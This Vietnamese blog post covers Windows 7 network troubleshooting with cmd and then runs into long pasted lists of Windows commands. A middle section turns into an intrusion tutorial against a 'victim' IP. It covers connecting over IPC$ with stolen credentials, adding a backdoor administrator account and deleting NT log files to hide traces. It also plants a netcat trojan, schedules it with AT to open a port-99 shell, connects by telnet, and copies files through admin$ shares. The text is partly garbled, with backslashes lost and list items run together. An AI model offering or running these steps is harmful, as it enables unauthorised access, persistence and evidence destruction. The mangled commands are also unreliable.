khắc phục các sự cố Mạng trong Windows 7 bằng cmdPosted on 13/02/2011 by thanhcuong1990

Giải quyết vấn đề về mạng nhiều khi đem lại khó khăn và phiền phức đối với mọi người dùng máy tính. Các công cụ kiểm tra kết nối mạng phổ thông hiện nay như Windows Network Diagnostic không thể khắc phục hết các lỗi gặp phải. Trong nhiều trường hợp, bạn có thể tự giải quyết chúng bằng tay thông qua các dòng lệnh trong cmd

Một số ưu điểm của việc sử dụng các dòng lệnh:

- Có thể kiểm tra từng mục riêng và phân loại những phần gây ra lỗi.

- Có nhiều lựa chọn để thử nghiệm cho hệ thống.

- Có thể sử dụng các script để các tiến trình diễn ra một cách tự động.

Trong bài viết sau chúng tôi sẽ hướng dẫn bạn cách sử dụng công cụ Command line để xác định và khắc phục một số lỗi về mạng trong hệ điều hành Windows 7.

Trước tiên bạn phải đăng nhập vào hệ thống với quyền quản trị Administrator.

Xác định giao thức kết nối

Để kiểm tra các vấn đề liên quan tới cáp kết nối mạng của mình bạn có thể sử dụng công cụ ipconfig. Windows sẽ hiển thị một danh sách các giao diện và cho biết các giao diện này có được kết nối hay không.

Xác định cổng đang làm việc

Các thiết bị ngoại vi như router có chức năng kết nối máy tính tới các mạng khác và mạng internet, nếu máy tính không thể kết nối được với thiết bị này đồng nghĩa với việc bạn không thể truy cập được vào mạng internet.

Điều đầu tiên bạn phải biết địa chỉ IP của router, bạn có thể sử dụng Ipconfig để xem thông tin mặc định của các cổng được kết nối.

Sau đó bạn có thể sử dụng câu lệnh Ping để kiểm tra phản hồi từ các cổng khác. Công cụ này sẽ có thông báo nếu địa chỉ IP của thiết bị nào đó có trả lời. Đây là một cách đơn giản để biết được các card mạng, cáp và bộ định tuyến đều được kết nối đúng.

Xác định DNS đang hoạt động

Máy chủ DNS cho chúng ta biết địa chỉ IP của một website qua tên của nó (ví dụ website www.google.com.vn có IP là 74.125.71.104). Địa chỉ này dùng để kết với các máy tính trong mạng internet, nếu không internet sẽ không hoạt động được.

Trong trường hợp này địa chỉ IP của router và DNS đều là 192.168.1.1

Để kiểm tra DNS bạn có thể sử dụng lệnh nslookup. Lệnh này sẽ tạo ra một truy vấn tới máy chủ như hình bên dưới:

Xác định các kết nối đang được mở

Mỗi khi một chương trình cần sử dụng tới internet hoặc các máy khác, nó sẽ tự động tạo các kết nối mới trong khi khả năng xử lý của router chỉ có hạn. Vì vậy nếu chương trình nào đó đang mở quá nhiều kết nối không cần thiết thì bạn có thể khóa lại bằng lệnh netstat với các thông số “a” và “b”.

netstat -a -b

 

Bạn có thể nhìn thấy những chương trình đang sử dụng cùng một kết nối. Trong trường hợp này bạn sẽ thấy một chương trình có tên “Filezilla Server” thuộc cổng 21.

Kiểm tra tường lửa

Tưởng lửa nếu bị cấu hình sai cũng là nguyên nhân gây ra sự cố về mạng. Một cấu hình của tưởng lửa có ảnh hưởng khá nhiều tới việc truy cập internet. Mặc định các thiết lập này được ẩn đi và bạn không thể nhìn thấy chúng trên màn hình. Chúng ta có thể chèn thêm các thông tin vào hệ thống của tường lửa bằng một tập tin với tên firewallrules.txt có nội dung như sau:

netsh advfirewall firewall show rule name=all > firewallrules.txt

notepad firewallrules.txt

Dòng lệnh đầu tiên sẽ truy cập vào cấu hình của tường lửa, còn lệnh thứ hai sẽ mở file này trong một cửa sổ notepad mới.

Tiện ích netsh sẽ cho chúng ta biết có rule nào ngăn chặn việc sử dụng lệnh này hay không:

netsh advfirewall firewall show rule name | find “Block”

Tuy nhiên, nó lại không hiển thị chương trình này bị chặn như thế nào bởi rule đó.

CÁC LỆNH CƠ BẢN CỦA CMD

Bài viết này mình giới thiệu sơ qua một số lệnh cơ bản trong command shell của windows XP. Để tìm hiểu kĩ các bạn thêm vào "/?" sau câu lệnh.

thêm ">>" hoặc ">" để xuất kết quả ra filevd : ipconfig /all >> c:\ip.txt

cipher : mã hóa file/thư mục

comp:so sánh nội dung hai filefc :so sánh file và hiển thị sự khác nhau

dir /s : tìm kiếm filefind (findstr) :kiếm chuỗi text trong file

eventcreate : tạo ra các sự kiện và thông báo...

for: tạo vòng lập ...

getmac : hiển thị thông tin card mạng.

gpudate : cập nhật group policy

hostname : hiển thị tên máy tính

label : tạo nhãn đĩa

md , mkdir : tạo thư mục

mountvol : quản lý volume mount point

move : chuyển file sang thư mục khác cùng ổ đĩa.

nbtstat : ht trạng thái netbios...

net accounts : quản lí account, pwd

net computer : thêm/xóa máy tính ra khỏi domain

net config sever : chỉnh sửa cấu hình dịch vụ của servernet config workstation : chỉnh sửa cấu hình dịch vụ của workstation

net continue : trở lại dịch vụ đã tạm dừng.

net file : quản lý các file mở trên 1 server.

net group :quản lý các global groupnet localgroup :quản lý các local group

net pause : dừng một dịch vụ

net print : quản lý việc in ấn.

net send : gửi thông điệp

net session : quản lí các phiên kết nối.

net share : quản lí việc chia sẻ file, thư mục

net start : liệt kê/chạy các dịch vụ mạngnet stop :ngưng dịch vụ mạng.

net time : ht , đồng bộ thời gian

net use: quản lí các kết nối .

net user: tạo các account

net view : hiển thị tài nguyên mạng.

netstat : trạng thái mạng.

117 CÂU LỆNH TRONG CMD:

1. Accessibility Controls - access.cpl2. Accessibility Wizard - accwiz3. Add Hardware Wizard - hdwwiz.cpl4. Add/Remove Programs - appwiz.cpl5. Administrative Tools - control admintools6. Automatic Updates - wuaucpl.cpl7. Bluetooth Transfer Wizard - fsquirt8. Calculator - calc9. Certificate Manager - certmgr.msc10. Character Map - charmap11. Check Disk Utility - chkdsk12. Clipboard Viewer - clipbrd13. Command Prompt - cmd

14. Component Services - dcomcnfg15. Computer Management - compmgmt.msc16. Control Panel - control17. Date and Time Properties - timedate.cpl18. DDE Shares - ddeshare19. Device Manager - devmgmt.msc20. Direct X Troubleshooter - dxdiag21. Disk Cleanup Utility - cleanmgr22. Disk Defragment - dfrg.msc23. Disk Management - diskmgmt.msc24. Disk Partition Manager - diskpart25. Display Properties - control desktop26. Display Properties - desk.cpl27. Dr. Watson System Troubleshooting Utility - drwtsn3228. Driver Verifier Utility - verifier29. Event Viewer - eventvwr.msc30. Files and Settings Transfer Tool - migwiz31. File Signature Verification Tool - sigverif32. Findfast - findfast.cpl33. Firefox - firefox34. Folders Properties - control folders35. Fonts - control fonts36. Fonts Folder - fonts37. Free Cell Card Game - freecell38. Game Controllers - joy.cpl39. Group Policy Editor (for xp professional) - gpedit.msc40. Hearts Card Game - mshearts41. Help and Support - helpctr42. HyperTerminal - hypertrm43. Iexpress Wizard - iexpress44. Indexing Service - ciadv.msc45. Internet Connection Wizard - icwconn146. Internet Explorer - iexplore47. Internet Properties - inetcpl.cpl48. Keyboard Properties - control keyboard49. Local Security Settings - secpol.msc50. Local Users and Groups - lusrmgr.msc51. Logs You Out Of Windows - logoff52. Malicious Software Removal Tool - mrt53. Microsoft Chat - winchat54. Microsoft Movie Maker - moviemk55. Microsoft Paint - mspaint56. Microsoft Syncronization Tool - mobsync57. Minesweeper Game - winmine58. Mouse Properties - control mouse59. Mouse Properties - main.cpl

60. Netmeeting - conf61. Network Connections - control netconnections62. Network Connections - ncpa.cpl63. Network Setup Wizard - netsetup.cpl64. Notepad notepad65. Object Packager - packager66. ODBC Data Source Administrator - odbccp32.cpl67. On Screen Keyboard - osk68. Outlook Express - msimn69. Paint - pbrush70. Password Properties - password.cpl71. Performance Monitor - perfmon.msc72. Performance Monitor - perfmon73. Phone and Modem Options - telephon.cpl74. Phone Dialer - dialer75. Pinball Game - pinball76. Power Configuration - powercfg.cpl77. Printers and Faxes - control printers78. Printers Folder - printers79. Regional Settings - intl.cpl80. Registry Editor - regedit81. Registry Editor - regedit3282. Remote Access Phonebook - rasphone83. Remote Desktop - mstsc84. Removable Storage - ntmsmgr.msc85. Removable Storage Operator Requests - ntmsoprq.msc86. Resultant Set of Policy (for xp professional) - rsop.msc87. Scanners and Cameras - sticpl.cpl88. Scheduled Tasks - control schedtasks89. Security Center - wscui.cpl90. Services - services.msc91. Shared Folders - fsmgmt.msc92. Shuts Down Windows - shutdown93. Sounds and Audio - mmsys.cpl94. Spider Solitare Card Game - spider95. SQL Client Configuration - cliconfg96. System Configuration Editor - sysedit97. System Configuration Utility - msconfig98. System Information - msinfo3299. System Properties - sysdm.cpl100. Task Manager - taskmgr101. TCP Tester - tcptest102. Telnet Client - telnet103. User Account Management - nusrmgr.cpl104. Utility Manager - utilman105. Windows Address Book - wab

106. Windows Address Book Import Utility - wabmig107. Windows Explorer - explorer108. Windows Firewall - firewall.cpl109. Windows Magnifier - magnify110. Windows Management Infrastructure - wmimgmt.msc111. Windows Media Player - wmplayer112. Windows Messenger - msmsgs113. Windows System Security Tool - syskey114. Windows Update Launches - wupdmgr115. Windows Version - winver116. Windows XP Tour Wizard - tourstart117. Wordpad - write

1 Số lệnh trong Run

Đây là 1 số lệnh:1. Character Map = charmap.exe (rất hữu dụng trong việc tìm kiếm các ký tự không thông dụng)2. Disk Cleanup = cleanmgr.exe (dọn dẹp đĩa để tăng dung lượng trống)3. Clipboard Viewer = clipbrd.exe (Xem nội dung của Windows clipboard)4. Dr Watson = drwtsn32.exe (Công cụ gỡ rối)5. DirectX diagnosis = dxdiag.exe (Chẩn đoán và thử DirectX, card màn hình & card âm thanh)6. Private character editor = eudcedit.exe (cho phép tạo ra hoặc sửa đổi các ký tự(nhân vật?))7. IExpress Wizard = iexpress.exe (Tạo ra các file nén tự bung hoặc các file tự cài đặt)8. Mcft Synchronization Manager = mobsync.exe (cho phép đồng bộ hóa thư mục trên mạng cho làm việc Offline. Không được cung cấp tài liệu rõ ràng).9. Windows Media Player 5.1 = mplay32.exe (phiên bản cũ của Windows Media Player, rất cơ bản).10. ODBC Data Source Administrator = odbcad32.exe (Làm một số việc với các cơ sở dữ liệu)11. Object Packager = packager.exe (Làm việc với các đối tượng đóng gói cho phép chèn file vào, có các file trợ giúp toàn diện).12. System Monitor = perfmon.exe (rất hữu ích, công cụ có tính cấu hình rất cao, cho bạn biết mọi thứ bạn muốn biết về bất kỳ khía cạnh nào của hiệu suất PC, for uber-geeks only )13. Program Manager = progman.exe (Legacy Windows 3.x desktop shell).14. Remote Access phone book = rasphone.exe (Tài liệu là ảo, không tồn tại).15. Registry Editor = regedt32.exe [also regedit.exe] (dành cho việc chỉnh sửa Windows Registry).16. Network shared folder wizard = shrpubw.exe (Tạo các thư mục được chia sẻ trên mạng).17. File siganture verification tool = sigverif.exe

18. Volume Contro = sndvol32.exe (Tôi bổ sung cái này cho những người bị mất nó từ vùng cảnh báo của hệ thống).19. System Configuration Editor = sysedit.exe (Sửa đổi System.ini & Win.ini giống như Win98! ).20. Mcft Telnet Client = telnet.exe21. Driver Verifier Manager = verifier.exe (có vẻ như là một tiện ích theo dõi hoạt động của các Driver(trình điều khiển) phần cứng ,có thể hữu ích đối với người gặp sự cố với các Driver. Khộng được cung cấp tài liệu)22. Windows for Workgroups Chat = winchat.exe (Xuất hiện như là 1 tiện ích WinNT cũ cho phép chat trong mạng LAN,có file trợ giúp).23. System configuration = msconfig.exe (Có thể sử dụng để quản lý các chương trình khởi động cùng với Windows)24. gpedit.msc được sử dụng để quản lý các chính sách nhóm và các quyền hạn.here are more 99 commandsAccessibility Controls: access.cplAdd Hardware Wizard: hdwwiz.cplAdd/Remove Programs:cappwiz.cplAdministrative Tools: control admintoolsAutomatic Updates: wuaucpl.cplBluetooth Transfer Wizard: fsquirtCalculator: calcCertificate Manager: certmgr.mscCharacter Map: charmapCheck Disk Utility:chkdskClipboard Viewer: clipbrdCommand Prompt: cmdComponent Services: dcomcnfgComputer Management: compmgmt.mscDate and Time Properties: timedate.cplDDE Shares: ddeshareDevice Manager: devmgmt.mscDirect X Control Panel (If Installed)*: directx.cplDirect X Troubleshooter: dxdiagDisk Cleanup Utility: cleanmgrDisk Defragment: dfrg.mscDisk Management: diskmgmt.mscDisk Partition Manager: diskpartDisplay Properties: control desktopDisplay Properties: desk.cplDisplay Properties (w/Appearance Tab Preselected): control colorDr. Watson System Troubleshooting Utility: drwtsn32Driver Verifier Utility: verifierEvent Viewer: eventvwr.mscFile Signature Verification Tool: sigverifFindfast: findfast.cplFolders Properties: control folders

Fonts: control fontsFonts Folder: fontsFree Cell Card Game: freecellGame Controllers: joy.cplGroup Policy Editor (XP Prof): gpedit.mscHearts Card Game: msheartsIexpress Wizard: iexpressIndexing Service: ciadv.mscInternet Properties: inetcpl.cplIP Configuration (Display Connection Configuration): ipconfig /allIP Configuration (Display DNS Cache Contents): ipconfig /displaydnsIP Configuration (Delete DNS Cache Contents): ipconfig /flushdnsIP Configuration (Release All Connections): ipconfig /releaseIP Configuration (Renew All Connections): ipconfig /renewIP Configuration (Refreshes DHCP & Re-Registers DNS): ipconfig /registerdnsIP Configuration (Display DHCP Class ID): ipconfig /showclassidIP Configuration (Modifies DHCP Class ID): ipconfig /setclassidava Control Panel (If Installed): jpicpl32.cplJava Control Panel (If Installed): javawsKeyboard Properties: control keyboardLocal Security Settings: secpol.mscLocal Users and Groups: lusrmgr.mscLogs You Out Of Windows: logoffMicrosoft Chat: winchatMinesweeper Game: winmineMouse Properties: control mouseMouse Properties: main.cplNetwork Connections: control netconnectionsNetwork Connections: ncpa.cplNetwork Setup Wizard: netsetup.cplNotepad: notepadNview Desktop Manager (If Installed): nvtuicpl.cplObject Packager: packagerODBC Data Source Administrator: odbccp32.cplOn Screen Keyboard: oskOpens AC3 Filter (If Installed): ac3filter.cplPassword Properties: password.cplPerformance Monitor: perfmon.mscPerformance Monitor: perfmonPhone and Modem Options: telephon.cplPower Configuration: powercfg.cplPrinters and Faxes: control printersPrinters Folder: printersPrivate Character Editor: eudceditQuicktime (If Installed): QuickTime.cplRegional Settings: intl.cpl

Registry Editor: regeditRegistry Editor: regedit32emote Desktop: mstscRemovable Storage: ntmsmgr.mscRemovable Storage Operator Requests: ntmsoprq.mscResultant Set of Policy (XP Prof): rsop.mscScanners and Cameras: sticpl.cplScheduled Tasks: control schedtasksSecurity Center: wscui.cplServices: services.mscShared Folders: fsmgmt.mscShuts Down Windows: shutdownSounds and Audio: mmsys.cplSpider Solitare Card Game: spiderSQL Client Configuration: cliconfgSystem Configuration Editor: syseditSystem Configuration Utility: msconfigSystem File Checker Utility (Scan Immediately): sfc /scannowSystem File Checker Utility (Scan Once At Next Boot): sfc /scanonceSystem File Checker Utility (Scan On Every Boot): sfc /scanbootSystem File Checker Utility (Return to Default Setting): sfc /revertSystem File Checker Utility (Purge File Cache): sfc /purgecacheSystem File Checker Utility (Set Cache Size to size x): sfc /cachesize=xSystem Properties: sysdm.cplTask Manager:taskmgrTelnet Client:telnetUser Account Management:nusrmgr.cplUtility Manager:utilmanWindows Firewall:firewall.cplWindows Magnifier:magnifyWindows Management Infrastructure:wmimgmt.mscWindows System Security Tool:syskeyWindows Update Launches:wupdmgrWindows XP Tour Wizard:tourstartWordpad:write hoặc wordpad.

1. Lệnh Ping : Cú pháp: Code: ping ip/host [/t][/a][/l][/n]- ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính. - Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C - Tham số /a: Nhận địa chỉ IP từ tên host - Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham

số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt. - Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5 Công dụng : + Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)....

2. Lệnh Tracert : Cú pháp :

Code: tracert ip/hostCông dụng : + Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.

3. Lệnh Net Send, gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP): Cú pháp:

Net send ip/host thông_điệp_muốn_gởi Công dụng: + Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi. + Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong phòng vi tính của trường tui thường dùng lệnh này để ghẹo mọi người! Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo cấu trúc sau :

Code: Net send * hello!I'm pro_hacker_invn4. Lệnh Netstat : Cú pháp:

Code: Netstat [/a][/e][/n]- Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening) - Tham số /e: hiển thị các thông tin thống kê Ethernet - Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối... Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm Công dụng :

+ Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta.

5. Lệnh IPCONFIG : Cú pháp:

Code: ipconfig /allCông dụng: + Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng...

6. Lệnh FTP (truyền tải file): Cú pháp:

Code: ftp ip/hostNếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau:

Code: ftp>_Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute FTP, Flash FXP. Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ. Một số lệnh ftp cơ bản:

-cd thu_muc: chuyển sang thư mục khác trên máy chủ - dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ - mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ - rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ - put file: tải một file file (đầy đủ cả đường dẫn. VD: c: pinaitap.exe) từ máy bạn đang sử dụng lên máy chủ. - close: Đóng phiên làm việc - quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command. Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu. Công dụng : + FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp

7. Lệnh Net View : Cú pháp:

Code: Net View [computer|/Domain[:ten_domain]]Công dụng:

+ Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.

+ Nếu đánh net view tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.

8. Lệnh Net Use : Cú pháp:

Code: Net use ipipc$ "pass" /user:"xxx"- ip: địa chỉ IP của victim. - xxx: user của máy victim - pass: password của user Giả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 . Ta dùng lệnh sau:

Code: Net use 68.135.23.25ipc$ "12345" /user:"victim"Công dụng: + kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập).

9. Lệnh Net User : Cú pháp:

Code: Net User [username pass] [/add]- Username : tên user cấn add - pass : password của user cần add Khi đã add đc user vào rùi thì ta tiến hành add user này vào nhóm administrator.

Code: Net Localgroup Adminstrator [username] [/add]Công dụng: + Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính. + Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào. Ví dụ: ta tiến hành add thêm một user có tên là uanhoa , password là :banvatoi vào với cấu trúc lệnh như sau:

Code: Net User xuanhoa banvatoi /addSau đó add user xuanhoa vào nhóm adminnistrator

Code:

Net Localgroup Administrator xuanhoa /add10. Lệnh Shutdown: Cú pháp:

Code: Shutdown [-m ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d up x:yy] (áp dụng cho win XP)- Tham số -mip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,.. - Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown. - Tham số -l : logg off (lưu ý ko thể thực hiện khi remote) - Tham số -s : shutdown - Tham số -r : shutdown và restart - Tham số -a : không cho shutdown - Tham số -f : shutdown mà ko cảnh báo - Tham số -c "comment" : lời cảnh báo trước khi shutdown - Tham số -d up x:yy : ko rõ

Code: shutdown ip (áp dụng win NT)Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn! Công dụng: + Shutdown máy tính.

11. Lệnh DIR : Cú pháp:

Code: DIR [drive:][path][filename]Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn. Công dụng: + Để xem file, folder.

12. Lệnh DEL : Cú pháp:

Code: DEL [drive:][path][filename]Lệnh này cũng căn bản rùi, ko phải nói nhìu. Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT:

Code: del C:winntsystem32logfiles*.* del C:winntssytem32config*.evt

del C:winntsystem32dtclog*.* del C:winntsystem32*.log del C:winntsystem32*.txt del C:winnt*.txt del C:winnt*.log13. Lệnh tạo ổ đĩa ảo trên computer: Cú pháp:

Code: Net use z: ipC$ ( hoặc là IPC$ )- Z là của mình...còn C$ là của Victim Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)

14. Lệnh Net Time : Cú pháp:

Code: Net Time ipCông dụng: + Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.

15. Lệnh AT: Cú pháp:

Code: AT ipCông dụng: + Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng. Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 .

Code: Net Time 68.135.23.25Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00.

Code: AT 68.135.23.25 12:3 nc.exeĐợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.

16. Lệnh Telnet: Cú pháp:

Code: telnet host portGõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie

Code: telnet 68.135.23.25 99Công dụng: + Kết nối đến host qua port xx 17. Lệnh COPY: Cú pháp:

Code: COPY /?Dùng lệnh trên để rõ hơn! Công dụng: + Copy file, tui khỏi nói thêm nhé. Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1

Code: Copy Index.html 127.0.0.1C$index.htmlnếu bạn copy lên folder winNt

Code: Copy index.html 127.0.0.1admin$index.htmlmuốn copy files trên máy victm thì bạn gõ vào :

Code: Copy 127.0.0.1Admin$epairsam._c:18. Lệnh SET: Cú pháp:

Code: SETCông dụng: + Displays, sets, or removes cmd.exe enviroment variables.

19. Lệnh Nbtstat: Cú pháp:

Code: Nbtstat /?Gõ lệnh trên để rõ hơn về lệnh này. Công dụng:

+ Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP)

FILES & FOLDERS

Bao gồm những lệnh cho phép bạn thực hiện các thao tác cơ bản đối với tập tin, thư mục và các ổ đĩa ... như tạo mới, chỉnh sửa, thiết lập các thuộc tính, sao chép, di chuyển, đổi tên, xóa ....

ASSOC Chỉnh sửa hoặc thiết lập mô tả cho một kiểu tập tin ATTRIB Thiết lập hoặc gỡ bỏ một thuộc tính của tập tin CACLS Phân quyền truy cập cho tập tin và thư mục CHKDSK Kiểm tra và sửa lổi các ổ đĩa CHKNTFS Thiết lập chế độ tự kiểm tra các phân vùng ổ cứng CIPHER Hiển thị hoặc chỉnh sửa sự mã hóa các tập tin, thư mục trên phân vùng dùng NTFS COMP So sánh tập tin COMPACT Hiển thi hoặc chỉnh sửa sự nén tập tin, thư mục trên phân vùng NTFS CONVERT Chuyển đổi các phân vùng sang NTFS COPY Sao chép các tập tin COPY CON Tạo một tập tin DEL Xóa tập tin DIR Hiển thị danh sách tập tin, thư mục EDIT Trình soạn thảo tập tin EDLIN Trình soạn thạo tập tin giản đơn EXE2BIN Chuyển đổi tập tin .exe sang tập tin nhị phân. EXPAND Giải nén tập tin *.cab FC So sánh và hiển thị sự khác biệt giữa 2 tập tin FIND Tìm một chuỗi văn bản trong một tập tin FINDSTR Tìm một chuỗi văn bản trong một tập tin nâng cao FOR Thực hiện một lệnh đối với mỗi tập tin trong một tập hợp các tập tin FORMAT Định dạng đĩa FTYPE Chỉnh sửa hoặc hiển thị lệnh để gọi ứng dụng mở cho một kiểu tập tin. LABEL Tạo nhãn cho các đĩa MD Tạo mới thư mục MOUNTVOL Tạo mới, xóa hoặc liệt kê số hiệu của đĩa MOVE Di chuyển các tập tin PRINT In một tập tin văn bản RECOVER Phục hồi các thông tin trên đĩa hỏng REN Đổi tên tập tin REPLACE Thay thế các tập tin SORT Sắp xếp nội dung dữ liệu bên trong tập tin SUBST Tạo một ổ ảo gắn với một thư mục trên máy TREE Hiển thị sơ đồ cây thư mục TYPE Xem nội dung một tập tin văn bản VOL Hiển thị số serial của đĩa

XCOPY Sao chép cả tập tin và thư mục

SYSTEMBao gồm những lệnh cho phép thay đổi thiết lập, hiển thị thông tin hệ thống Windows và hệ thống phụ MS-Dos trên Windows.

APPEND Cho phép các ứng dụng tìm kiếm dữ liệu trong các thư mục chỉ định AT Lập lịch để thực hiện một lệnh tự động nhờ dịch vụ Scheduler. CALL Gọi thi hành một tập lệnh CD Chuyển đổi thư mục hện hành. CHCP Thiết lập ngôn ngữ sử dụng cho hệ thống CMD Khởi động một sử kiện mới của trình biên dịch lệnh. DATE Hiển thị hoặc thiết lập ngày hệ thống DEBUG Thực hiện bẩy lỗi một ứng dụng Dos. DIVICE Tải vào bộ nhớ các trình điều khiển thiết bị DEVICEHIGH Tải ác trình điều khiển thiết bị vào vùng nhớ bậc cao. DOSKEY Gọi ứng dụng Doskey DOSONLY Ngăn chạy một ứng dụng không phải là ứng dụng Dos FCBS Chỉ định số khối điều khiển tập tin được mở... FILES Chỉ định số tập tin có thể truy cập cùng lúc. FORCEDOS Khởi động một ứng dụng Dos GOTO Chuyển đến một vị trí trong tập tin lệnh HELP Hiển thị trợ giúp IF Thực hiện một lệnh theo điều kiện INSTALL Tải một ứng dụng vào bộ nhớ LOADFIX Tải một ứng dụng vào vùng nhớ phía trên 64KB đầu tiên của vùng nhớ quy ước LOADHIGH Tải một ứng dụng vào vùng nhớ bậc cao MEM Hiển thị về bộ nhớ được cấp phát cho hệ thống con MS-DOS. POPD Khôi phục lại thư mục hiện tại cho hệ thống Dos PUSHD Lưu trữ thư mục hiện tại và chuyển sang thư mục khác. RUNAS Chạy một ứng dụng với bằng quyền của người dùng khác SET Hiển thị, thiết lập hoặc xóa một biến số môi trường. SETVER Thiết lập số phiên bản Ms-Dos cho các ứng dụng. SHELL Chạy một trình biên dịch thay thế TIME Thiết lập hoặc hiển thị giờ hệ thống VERSION Hiển thị số phiên bản của hệ điều hành.NETWORKBao gồm những lệnh rất hữu ích nếu bạn là một nhà quản trị mạng, có những lệnh giúp bạn làm việc nhanh hơn so với dùng giao diện của HĐH Windows.

ATMADM Theo dõi các kết nối ATM EVNTCMD Hiển thị các sự kiện của dịch vụ SNMPFINGER Hiển thị thông tin người dùng hệ thống chạy dịch vụ Finger FTP Khởi động cửa số kết nối để truyền tập tin

HOSTNAME Hiển thị tên máy IPCONFIG Hiển thị thông tin về địa chỉ IP, subnet mask... IRFTP Truyền tập tin qua cổng hồng ngoại LPQ Hiển thị trạng thái chuỗi in LPR In một tập tin trên mạng NET ACCOUNTS Các thiết lập về tài khoản ngừơi dùng NET COMPUTER Thiết lập cho các máy trên tên miền. NET CONFIG Hiển thị, hoặc cấu hình cho các dịch vụ đang chạy NET CONTINUE Phục hồi một dịch vụ bị tạm dừng NET FILE Hiển thị tất cả các tập tin sẵn sàng chia sẽ trên một máy. NET GROUP Thiết lập cho các nhóm trên mạng NET HELP Hiển thị các giúp đỡ cho các lệnh về mạng NET HELPMSG Giải thích cho một mã lỗi của Windows 2000 NET LOCALGROUP Thiết lập cho các nhóm nội trên máy. NET NAME Thiết lập các biệt danh trong mạng NET PAUSE Tạm dừng một dịch vụ NET PRINT Thiết lập công việc in ấn NET SEND Gửi một thông điệp trên mạng nội bộ NET SESSION Cấu hình cho một phiên làm việc trên mạng NET SHARE Chia sẽ tài nguyên trên máy NET START Khởi động một dịch vụ trên máy NET STATISTICS Hiển thị tình hình hoạt động của các thành phần của dịch vụ 